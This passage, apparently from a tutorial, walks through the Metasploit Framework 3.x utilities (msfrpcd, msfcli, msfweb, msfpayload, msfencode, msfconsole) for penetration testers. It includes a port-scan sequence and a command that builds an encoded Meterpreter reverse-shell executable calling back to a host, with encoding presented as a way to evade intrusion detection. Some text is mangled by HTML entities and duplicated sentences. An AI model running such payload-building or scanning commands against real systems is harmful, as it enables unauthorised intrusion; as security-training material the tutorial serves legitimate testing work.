6. A group of penetration testers collaborating on testing the same network or different networks.
7. A penetration tester remotely logging in to the pre-configured Metasploit system, and launching exploits from there.The channels available with Metasploit v3.x are listed below:<br />The Directory Structure of the Framework<br />Updating Metasploit<br />The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through a HTTP proxy server, please see the Subversion FAQ on proxy access:<br />http://subversion.tigris.org/faq.html#proxy<br />One of the primary values of Metasploit is that it is constantly being updated to provide exploits for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g before every use), you give yourself the best<br />chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you’ve downloaded Metasploit, you now keep it up to date simply by using your Subversion client of choice to “update” the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:<br />svn update<br />At revision 4532.<br />This isn’t a particularly exciting example because my Metasploit was already up to date, but then again, that’s a good thing. If your Metasploit was in need of updating, you would see a list of file modifications and deletions more like this:<br />svn update<br />UU modules/nops/ppc/simple.rb<br />UU modules/nops/x86/opty2.rb<br />UU modules/nops/x86/single_byte.rb<br />UU modules/nops/nop_test.rb.ut.rb<br />A modules/nops/php<br />A modules/nops/php/generic.rb<br />UU modules/nops/sparc/random.rb<br />…………<br />………..<br />Updated to version 4532<br />Msfopcode<br />The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site.With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are available when executing this utility with the –h switch. This interface is merely a front end to the ex::Exploitation::OpcodeDb::Client class interface that interfaces with a HTTP-based XML protocol running on the Metasploit.com Web server.<br />./msfopcode<br />Usage: msfopcode command<br />SUPPORTED COMMANDS<br />stats Display database statistics<br />locales Display supported locales<br />metatypes Display Supported opcode meta types (Ex: imp reg)<br />groups Display supported opcode groups (Ex:esp=>eip)<br />types Display supported opcode type (Ex: imp esp)<br />platforms Display supported platforms<br />modules Display information about specific modules<br />search Search for opcode given a set of criteria<br />The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated. The output to this command looks something like this:<br />./msfopcode stats<br />Last Updated : Sat Sep 03 01:32:00 CDT 2005<br />Number of Opcodes : 12177419<br />Number of Opcode Types : 320<br />Number of Platforms : 14<br />Number of Architectures : 1<br />Number of Modules : 17683<br />Number of Module Segments: 71457<br />Number of Module Imports : 2065492<br />Number of Module Exports : 927637<br />Msfrpc/ Msfrpcd<br />The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected. The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, This service listens on port 55553, uses SSL, and is password protected.The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.<br />[ USAGE ]<br />To activate the RPC interface, launch msfrpcd, or load msfconsole and load the xmlrpc plugin.<br />./msfrpcd -P s3cr3tp4ss<br />- or -<br />msf> load xmlrpc Pass=password<br />Once the interface is started, any compatible RPC interface be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service.<br />./msfrpc -h server_name -P s3cr3tp4ss<br />[*] The 'rpc' object holds the RPC client interface<br />>> rpc.call(quot;
core.versionquot;
)<br />=> {quot;
versionquot;
=>quot;
3.3-devquot;
}<br />Msfd<br />The msfd utility opens a network interface to the msfconsole. It can be executed by specifying the IP address and the port on which it should listen for incoming connections.This allows a single user or multiple users to connect from a remote system to the framework. For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:<br />msfd -a 192.168.137.128 –d –p 55554<br />Msfelfscan/ Msfpescan/ Msfmachscan<br />Msfelfscan, used to locate interesting addresses within executable and linkable format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows binaries.<br />Auxiliary Modules<br />Auxiliary modules are essentially used to cover the first stage of a penetration test—fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that will target one host or a range of user specified hosts. Auxiliary modules can also import any Exploit module mixin, and leverage the protocol-specific application program interfaces (APIs) for Distributed Computing Environment Remote Procedure Call [DCERPC], HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols. Any exploitation code that does not use a payload would be part of the auxiliary module system.This currently includes dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).<br />List all auxiliary modules<br />Metasploit 3.0 supports the auxiliary modules which can be used to perform arbitrary, one-o_ actions such as port scanning, denial of service, and even fuzzing.<br />Now use the appropriate auxiliary module as per your requirement:<br />msf > use scanner/portscan/tcp<br />msf > show options<br />msf > set rhosts 192.168.1.100 or 192.168.1.1/24<br />msf > set ports 1-1024<br />msf > run<br />TCP portscan Result<br />Msfgui<br />The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.<br />This new GUI is multi-platform and it is based on Java, the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interface. The GUI can be ran by invoking the msfgui script at the base of the Metasploit directory<br />./msfgui<br />The Metasploit Graphical User Interface<br />Msfcli<br />The msfcli interface allows for exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability. A simple shell script can be written, which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the –h switch gives us the options available with this interface A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:<br />1. Display information about a selected exploit ./msfcli <exploit_name> S<br />2. Show available payloads ./msfcli <exploit_name> P<br />3. Choose the payload with this exploit, and display the options that need to be set<br />./msfcli <exploit_name> PAYLOAD=<payload_name> O<br />4. List available targets ./msfcli <exploit_name> PAYLOAD=<payload_name> T<br />5. Set the required options in option=value form and execute with the E mode<br />Exploiting Windows Box with Msfcli<br />Msfweb<br />The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).<br />The main msfweb interface consists of a toolbar containing various icons and a background with the metasploit logo. If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, con_guring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.<br />The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the –h switch, as shown in the following example:<br />./msfweb –h<br />Usage: msfweb <options><br />OPTIONS:<br />-a <opt> Bind to this IP address instead of loopback<br />-d Daemonize the web server<br />-h Help banner<br />-p <opt> Bind to this port instead of 55555<br />-v <opt> A number between 0 and 3 that controls log verbosity<br />For instance, the following command would launch the Web interface on IP address<br />192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).<br />./msfweb -a 192.168.1.10 –d<br />Now on any browser type url<br />http://192.168.1.10:5555<br />Msfencode<br />The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed out using the –l option. Other options that can be used are available using the –h switch.<br />A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or to read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability. Let’s say we want to encode the payload, but limit ourselves to an alpha-numeric output. We would also like to avoid the NULL (0x00) byte from occurring in the output. This can be done with the msfencode command As can be seen, the size of the output has increased due to the encoding—it was 116 bytes after running the msfpayload command where we redirected the output in raw format to the file in_exec_raw. But when this file is given as input to the encoder, it is now 296 bytes.<br />./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444<br />R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe<br />Generating encoded executable meterpreter reverse Payload<br />Msfpayload<br />The msfpayload utility enables the user to modify existing payloads depending on supplied parameters on the command line, and obtain the output in C, Perl, Ruby or Raw.The following example illustrates the use of msfpayload. The msfpayload –h command lists out the options that can be used along with all the available payloads. We now need to select a payload. The S option shows us information about a specific Payload.<br />After selecting a particular payload to play around with, we can then have msfpayload modify values within the payload, and produce an output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output with the Raw format, which allows it to be piped to another program, such as msfencode, or could be redirected to a file. As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created, which would execute that particular command upon successful exploitation.We will set it to a very straightforward dir command, and obtain the output for including it in a Ruby script, as shown below:<br />./msfpayload windows/exec CMD=calc.exe P<br />Msfconsole<br />The msfconsole is the traditional and primary means of using the MSF. After installation, the console can be simply launched by typing the command ./msfconsole (for UNIX) and msfconsole (for Windows) from within the path where it has been installed.The prompt that appears as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the exploit, the intuitive command to type is help and the output from this is shown below.<br />Launching the MSF console<br />Output of the help or ? Command<br />